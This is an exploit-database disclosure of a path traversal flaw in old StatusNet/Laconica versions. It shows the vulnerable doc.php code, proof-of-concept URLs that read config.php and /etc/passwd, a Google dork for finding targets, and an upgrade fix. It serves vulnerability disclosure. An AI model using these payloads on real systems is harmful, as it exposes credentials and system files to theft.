StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading

EDB-ID:

28956

CVE:



Platform:

PHP

Published:

2013-10-14

+-------------------------------------------------------------------------------+
+ StatusNet/Laconica <= 0.7.4, <= 0.8.2, <= 0.9.0beta3 - arbitrary file reading +
+-------------------------------------------------------------------------------+

# Date:
	- 10/10/2013

# Exploit Author:
	- spiderboy

# Vendor Homepage:
	- http://status.net/

# Software Links:
	- http://status.net/laconica-0.7.4.tar.gz
	- http://status.net/statusnet-0.8.2.tar.gz
	- http://status.net/statusnet-0.9.0beta3.tar.gz

# Version:
	- Branch 0.7.X : <= 0.7.4
	- Branch 0.8.X : <= 0.8.2
	- Branch 0.9.X : <= 0.9.0beta3

# Tested on:
	- Unix/Linux

# Category:
	- Webapps

# Platform:
	- php

# Advisories :
	- http://status.net/wiki/Security_alert_0000002
	- http://osvdb.org/show/osvdb/95586

# Google Dork:
	- "It runs the StatusNet microblogging software, version 0.8.2"

# Vendor product description:
	- Free and Open Source social software

# Vulnerable code:
	- actions/doc.php:
	--------------------------------------------------------------------
	function handle($args)
	{
		parent::handle($args);
		$this->title    = $this->trimmed('title');
		$this->filename = INSTALLDIR.'/doc-src/'.$this->title; //[1]
		if (!file_exists($this->filename)) {
			$this->clientError(_('No such document.'));
			return;
		}
		$this->showPage();
	}
	--------------------------------------------------------------------
	[1] : No check on user-supplied parameter $this->title

# Proof of concept:
	- http://[host]/index.php?action=doc&title=../config.php
	- http://[host]/index.php?action=doc&title=../../../../../../../../etc/passwd

# Solution:
	- Upgrade to latest version : http://status.net/download